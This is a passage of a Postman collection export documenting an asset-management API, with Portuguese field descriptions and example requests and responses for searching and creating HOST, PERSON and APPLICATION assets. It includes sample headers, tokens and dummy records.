cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01q5vu5f1vmele1jioxv79ngkee1197.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=c1ae21fa-af7b-40ca-bca5-1b732f737e7a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01q5vu5f1vmele1jioxv79ngkee1197.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"c1ae21fa-af7b-40ca-bca5-1b732f737e7a","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"50582cab-b931-463d-9ce9-a4decb928a41","name":"Search APP, PROCESS or OTHERS with Severity 0 or 2","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": [\"APPLICATION\", \"PROCESS\", \"OTHERS\"],\n\t\"severity\": [0, 2]\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 14 Jun 2019 18:32:18 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0l9z1v3zrbsnabpcmq68jgyrb1038.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01vnamjkjaqbpdb5ye5ur8enfr1062.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=2dd5db88-9cc1-4162-bf60-4485c14e03e0;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01vnamjkjaqbpdb5ye5ur8enfr1062.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"2dd5db88-9cc1-4162-bf60-4485c14e03e0","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"score\": 0,\n            \"type\": \"APPLICATION\",\n            \"severity\": 2,\n            \"port\": 80,\n            \"asset_id\": \"5cd309a0c569d571d3afcd7f\",\n            \"app_url\": \"http://teste.com.br\",\n            \"app_credentials\": \"admin/admin\",\n            \"app_description\": \"Web app description\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"PROCESS\",\n            \"severity\": 0,\n            \"asset_id\": \"5cc36718c569d57711bf2ec4\",\n            \"process_name\": \"BACEN 4.658\",\n            \"process_description\": \"BACEN 4.658\"\n        },\n        {\n            \"type\": \"PROCESS\",\n            \"severity\": 0,\n            \"asset_id\": \"5c9d26aac569d52163521222\",\n            \"process_name\": \"SDLC\",\n            \"process_description\": \"SDLC\"\n        },\n        {\n            \"score\": 0,\n            \"type\": \"PROCESS\",\n            \"severity\": 0,\n            \"tag\": [\n                \"Tag 1\",\n                \"Tag 2\",\n                \"Tag 3\"\n            ],\n            \"asset_id\": \"5c9d2214c569d521635211a8\",\n            \"process_name\": \"Fornecedor X\",\n            \"process_description\": \"Fornecedor X\"\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 30,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"totalPages\": 1,\n    \"totalElements\": 4,\n    \"last\": true,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 4,\n    \"size\": 30,\n    \"number\": 0\n}"}],"_postman_id":"d327c0be-d761-40f9-b720-2ce4c20d3c49"},{"name":"Create a new Asset","id":"47dc7345-882d-499b-adfe-11bde35fadf9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"formdata","formdata":[{"key":"type","value":"String","description":"<p>[requerido] \"HOST\", \"APPLICATION\", \"COMPANY\", \"CLOUD\", \"PERSON\", \"PROCESS\" ou \"OTHERS\".</p>\n","type":"text"},{"key":"key","value":"String","description":"<p>[requerido] Key do Ativo.\nHOST = IP\nAPPLICATION = URL\nPERSON = EMAIL\nOTHERS = NAME</p>\n","type":"text"},{"key":"tags","value":"List<String>","description":"<p>[opcional] Lista de Tags.</p>\n","type":"text"},{"key":"severity","value":"Int","description":"<p>[opcional] Número inteiro de 0 até 4. Caso não seja especificado, o padao é 0.</p>\n","type":"text"},{"key":"last_seen","value":"String","description":"<p>[opcional] Uma data no formato \"AAAA-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"asset_group","value":"List<String>","description":"<p>[opcional] Lista de ID de Assets Group Ativos.</p>\n","type":"text"},{"key":"location","value":"List<Double>","description":"<p>[opcional] Uma lista contendo 2 valores de coordenadas.</p>\n","type":"text"},{"key":"host","value":"Object","description":"<p>[opcional se type==HOST] Objeto contendo \"type\", \"hostname\", \"os\", \"os_version\", \"kernel\", \"netbios\", \"mac_address\", \"patches\" e \"services\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.type","value":"String","description":"<p>[opcional se type==HOST] O tipo do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.hostname","value":"String","description":"<p>[opcional se type==HOST] Hostname do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.os","value":"String","description":"<p>[opcional se type==HOST] Sistema Operacional do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.os_version","value":"String","description":"<p>[opcional se type==HOST] Versão do Sistema Operacional do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.kernel","value":"String","description":"<p>[opcional se type==HOST] Versão do Kernel do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.netbios","value":"String","description":"<p>[opcional se type==HOST] Netbios do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.mac_address","value":"String","description":"<p>[opcional se type==HOST] Endereço MAC do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.patches","value":"List<Object>","description":"<p>[opcional se type==HOST] Lista de Objetos contendo \"name\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.patches.name","value":"String","description":"<p>[opcional se type==HOST] Patch Name do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services","value":"List<Object>","description":"<p>[opcional se type==HOST] Lista de Objetos contendo \"name\", \"protocol\", \"vendor\", \"version\", \"port\" e \"status\" como mostrado abaixo.</p>\n","type":"text"},{"key":"host.services.name","value":"String","description":"<p>[opcional se type==HOST] Service Name do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.protocol","value":"String","description":"<p>[opcional se type==HOST] Service Protocol do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.vendor","value":"String","description":"<p>[opcional se type==HOST] Service Vendor do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.version","value":"String","description":"<p>[opcional se type==HOST] Service Version do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.port","value":"Int","description":"<p>[opcional se type==HOST] Service Port do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"host.services.status","value":"String","description":"<p>[opcional se type==HOST] Service Status do Ativo do tipo HOST.</p>\n","type":"text"},{"key":"app","value":"Object","description":"<p>[opcional se type==APPLICATION] Objeto contendo \"description\", \"credentials\", \"port\", \"backend\", \"frontend\", \"database\" e \"visibility\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.description","value":"String","description":"<p>[opcional se type==APPLICATION] Descrição do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.credentials","value":"String","description":"<p>[opcional se type==APPLICATION] Credenciais do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.port","value":"Int","description":"<p>[opcional se type==APPLICATION] Porta do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.backend","value":"List<Object>","description":"<p>[opcional se type==APPLICATION] Lista de Objetos contendo \"name\" e \"version\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.backend.name","value":"String","description":"<p>[opcional se type==APPLICATION] Nome do Backend do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.backend.version","value":"String","description":"<p>[opcional se type==APPLICATION] Versão do Backend do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.frontend","value":"List<Object>","description":"<p>[opcional se type==APPLICATION] Lista de Objetos contendo \"name\" e \"version\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.frontend.name","value":"String","description":"<p>[opcional se type==APPLICATION] Nome do Frontend do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.frontend.version","value":"String","description":"<p>[opcional se type==APPLICATION] Versão do Frontend do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.database","value":"List<Object>","description":"<p>[opcional se type==APPLICATION] Lista de Objetos contendo \"name\" e \"version\" como mostrado abaixo.</p>\n","type":"text"},{"key":"app.database.name","value":"String","description":"<p>[opcional se type==APPLICATION] Nome do Banco de Dados do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.database.version","value":"String","description":"<p>[opcional se type==APPLICATION] Versão do Banco de Dados do Ativo do tipo APPLICATION.</p>\n","type":"text"},{"key":"app.visibility","value":"String","description":"<p>[opcional se type==APPLICATION] \"INTERNAL\" ou \"EXTERNAL\".</p>\n","type":"text"},{"key":"company","value":"Object","description":"<p>[opcional se type==COMPANY] Objeto contendo \"description\", \"domains\", \"subdomains\", \"email_addresses\", \"phone_number\", \"responsible\" e \"doc_number\" como mostrado abaixo.</p>\n","type":"text"},{"key":"company.description","value":"String","description":"<p>[opcional se type==COMPANY] Descrição do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.domains","value":"List<String>","description":"<p>[opcional se type==COMPANY] Lista de Domínios do Ativo do tipo Company.</p>\n","type":"text"},{"key":"company.sudomains","value":"List<String>","description":"<p>[opcional se type==COMPANY] Lista de Subdomínios do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.email_addresses","value":"List<String>","description":"<p>[opcional se type==COMPANY] Lista de Endereços de Email do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.phone_number","value":"String","description":"<p>[opcional se type==COMPANY] Número de Telefone do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.responsible","value":"Object","description":"<p>[opcional se type==COMPANY] Objeto contendo \"name\" e \"email_address\"  como mostrado abaixo.</p>\n","type":"text"},{"key":"company.responsible.name","value":"String","description":"<p>[opcional se type==COMPANY] Nome do Responsável do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.responsible.email_address","value":"String","description":"<p>[opcional se type==COMPANY] Endereço de Email do Responsável do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"company.doc_number","value":"String","description":"<p>[opcional se type==COMPANY] Número de Documento do Ativo do tipo COMPANY.</p>\n","type":"text"},{"key":"cloud","value":"Object","description":"<p>[opcional se type==CLOUD] Objeto contendo \"instance_id\", \"provider\", \"instance_type\", \"region\", \"image_id\", \"internal_ip_addresses\", \"public_ip_address\" e \"security_groups\" como mostrado abaixo.</p>\n","type":"text"},{"key":"cloud.instance_id","value":"String","description":"<p>[opcional se type==CLOUD] Instance ID do Ativo do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.provider","value":"String","description":"<p>[requerido se type==CLOUD] Provider do Ativo do tipo CLOUD. Pode ser: \"AWS\", \"AZURE\", \"DOCKER\" ou \"DHCP\".</p>\n","type":"text"},{"key":"cloud.instance_type","value":"String","description":"<p>[opcional se type==CLOUD] Instance Type do Ativo do tipo CLOUD. Exemplo: \"EC2\".</p>\n","type":"text"},{"key":"cloud.region","value":"String","description":"<p>[opcional se type==CLOUD] Região do Ativo do tipo CLOUD. Exemplo: \"us-west-2\".</p>\n","type":"text"},{"key":"cloud.image_id","value":"String","description":"<p>[opcional se type==CLOUD] Image ID do Ativo do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.internal_ip_addresses","value":"List<String>","description":"<p>[opcional se type==CLOUD] Lista de IPs internos do Ativo do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.public_ip_address","value":"String","description":"<p>[opcional se type==CLOUD] IP externo do Ativo do tipo CLOUD.</p>\n","type":"text"},{"key":"cloud.security_groups","value":"List<String>","description":"<p>[opcional se type==CLOUD] Lista de Security Groups de Ativos do tipo CLOUD.</p>\n","type":"text"},{"key":"person","value":"Object","description":"<p>[opcional se type==PERSON] Objeto contendo \"first_name\", \"last_name\", \"doc_number\", \"phone_number\", \"social_networks\" e \"address\" como mostrado abaixo.</p>\n","type":"text"},{"key":"person.first_name","value":"String","description":"<p>[opcional se type==PERSON] Primeiro Nome do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.last_name","value":"String","description":"<p>[opcional se type==PERSON] Sobrenome do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.doc_number","value":"String","description":"<p>[opcional se type==PERSON] Número de Documento do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.phone_number","value":"String","description":"<p>[opcional se type==PERSON] Número de Telefone do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.social_networks","value":"List<Object>","description":"<p>[opcional se type==PERSON] Lista de Objetos contendo \"name\" e \"link\" como mostrado abaixo.</p>\n","type":"text"},{"key":"person.social_networks.name","value":"String","description":"<p>[opcional se type==PERSON] Nome da Rede Social do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.social_networks.link","value":"String","description":"<p>[opcional se type==PERSON] Link da Rede Social do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address","value":"Object","description":"<p>[opcional se type==PERSON] Objeto contendo \"street\", \"number\", \"city\", \"state\", \"country\" e \"postal_code\" como mostrado abaixo.</p>\n","type":"text"},{"key":"person.address.street","value":"String","description":"<p>[opcional se type==PERSON] Rua do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.number","value":"String","description":"<p>[opcional se type==PERSON] Número do Endereço do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.city","value":"String","description":"<p>[opcional se type==PERSON] Cidade do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.state","value":"String","description":"<p>[opcional se type==PERSON] Estado do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.country","value":"String","description":"<p>[opcional se type==PERSON] País do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"person.address.postal_code","value":"String","description":"<p>[opcional se type==PERSON] Código Postal do Ativo do tipo PERSON.</p>\n","type":"text"},{"key":"process","value":"Object","description":"<p>[opcional se type==PROCESS] Objeto contendo \"description\" como mostrado abaixo.</p>\n","type":"text"},{"key":"process.description","value":"String","description":"<p>[opcional se type==PROCESS] Descrição do Ativo do tipo PROCESS.</p>\n","type":"text"},{"key":"others","value":"Object","description":"<p>[opcional se type==OTHERS] Objeto contendo \"key\", \"description\", \"severity\", tags\", \"asset_group\" como mostrado abaixo.</p>\n","type":"text"},{"key":"others.key","value":"String","description":"<p>[requerido se type==OTHERS] Nome do Ativo do tipo OTHERS.</p>\n","type":"text"},{"key":"others.description","value":"String","description":"<p>[opcional se type==OTHERS] Descrição do Ativo do tipo OTHERS.</p>\n","type":"text"},{"key":"","value":"","type":"text","disabled":true},{"key":"","value":"","type":"text","disabled":true}]},"url":"https://<instance>/api/v2/assets","description":"<p>Esse <em>endpoint</em> permite criar um novo Ativo. Os campos requeridos irão depender do tipo de Ativo. Portanto, caso seja um Ativo do tipo \"HOST\", um objeto \"host\" que contém campos relacionados ao HOST, poderá ser especificado no corpo da requisição. Caso o corpo da requisição possua um objeto que não condiz com o tipo de Ativo sendo cadastrado, o mesmo será ignorado e apenas os campos permitidos serão salvos.</p>\n","auth":{"type":"bearer","bearer":{"basicConfig":[{"key":"token","value":"<token>"}]},"isInherited":true,"source":{"_postman_id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","id":"b151743b-05fe-4f8a-8774-bb0f78ea3db6","name":"Ativos","type":"folder"}},"urlObject":{"protocol":"https","path":["api","v2","assets"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"749675d9-bd12-4965-bcff-59b79f6ad249","name":"Create a new PERSON","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"PERSON\",\n\t\"person_email\": \"christine.mitchell@mycompany.com\",\n\t\"person_name\": \"Christine\",\n\t\"person_surname\": \"Mitchell\",\n\t\"person_city\": \"Salinas\",\n\t\"person_country\": \"USA\",\n\t\"person_phone\": \"831-996-1186\",\n\t\"person_doc\": \"133-86-4451\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:45:21 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0ql9j1sg4ap9o1lipqeyo3y60o2780.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01v3kqwbq7omhxzj41s7o0gx722955.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=301f9bc7-682f-41d6-847f-6683ec4d814d;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01v3kqwbq7omhxzj41s7o0gx722955.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"301f9bc7-682f-41d6-847f-6683ec4d814d","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\r\n    \"type\": \"PERSON\",\r\n    \"severity\": 0,\r\n    \"asset_id\": \"5d07c3a1c569d501433591b7\",\r\n    \"person_email\": \"christine.mitchell@mycompany.com\",\r\n    \"person_name\": \"Christine\",\r\n    \"person_surname\": \"Mitchell\",\r\n    \"person_city\": \"Salinas\",\r\n    \"person_country\": \"USA\",\r\n    \"person_phone\": \"831-996-1186\",\r\n    \"person_doc\": \"133-86-4451\"\r\n}"},{"id":"de674eb0-b48e-4b68-a14d-f1b4de343fe8","name":"Create a new HOST","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"HOST\",\n\t\"severity\": 4,\n\t\"host_ip\": \"192.168.54.40\",\n\t\"host_os\": \"Linux Mint 18.1\",\n\t\"hostname\": \"dmz80.servicos-dmz\",\n\t\"host_netbios\": \"DMZ80\",\n\t\"tags\": [\"a\", \"b\"]\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:31:28 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node015y7ff5ef1kaw1xntg8tuheggm2715.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0z75m0iid01ie1j3vggchon3lp2747.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=8cf025fc-7eb6-478b-807a-19cc3dd7636a;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0z75m0iid01ie1j3vggchon3lp2747.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"8cf025fc-7eb6-478b-807a-19cc3dd7636a","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"hostname\": \"dmz80.servicos-dmz\",\n    \"type\": \"HOST\",\n    \"severity\": 4,\n    \"asset_id\": \"5d07c060c569d5014335918b\",\n    \"host_ip\": \"192.168.54.40\",\n    \"host_os\": \"Linux Mint 18.1\",\n    \"host_netbios\": \"DMZ80\",\n    \"tags\": [\n        \"a\",\n        \"b\"\n    ]\n}"},{"id":"99acf19b-a6ac-47f2-8570-1e096cd37aa0","name":"Asset Already Exists","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"body":{"mode":"raw","raw":"{\n\t\"type\": \"HOST\",\n\t\"host_ip\": \"192.168.1.12\",\n\t\"hostname\": \"tprbdmz112.servicos.dmz\"\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/assets?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","assets"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Conflict","code":409,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Mon, 17 Jun 2019 16:57:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01l3gsh3nstkk1gtm76pufxbl3100.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0y3n9qi6bwv6c144bnw0mufmyp3127.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP 